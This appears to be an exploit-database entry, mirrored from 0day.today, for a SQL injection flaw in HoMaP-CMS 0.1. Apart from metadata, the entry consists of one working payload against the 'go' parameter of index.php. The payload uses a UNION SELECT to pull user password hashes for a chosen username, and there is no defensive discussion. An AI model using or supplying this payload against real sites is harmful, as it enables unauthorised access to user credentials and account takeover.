id: 9652
date: 03/12/2010
title: HoMaP-CMS 0.1 (index.php go) SQL Injection Vulnerability
author: Yakir Wizman
cves: 

========================================================
HoMaP-CMS 0.1 (index.php go) SQL Injection Vulnerability
========================================================

# Exploit Title: HoMaP-CMS 0.1 (index.php go) SQL Injection Vulnerability
# Date: 17/04/2007
# Author: Pr0T3cT10n
# Software Link: SourceForge.net
# Version: 0.1
# Tested on: 0.1
# CVE:
# Code:
--------------------------------------------------------------------------------------------------------------------------------
// HoMaP-CMS 0.1 (index.php go) SQL Injection Vulnerability
// Author: Pr0T3cT10n (ISRAEL)
// Download: SourceForge.net
// Version affected: 0.1
// Exploit: index.php?go=0'+union+select+passwd+from+user+where+username=[USERNAME]
--------------------------------------------------------------------------------------------------------------------------------






#  0day.today [2023-03-23]  #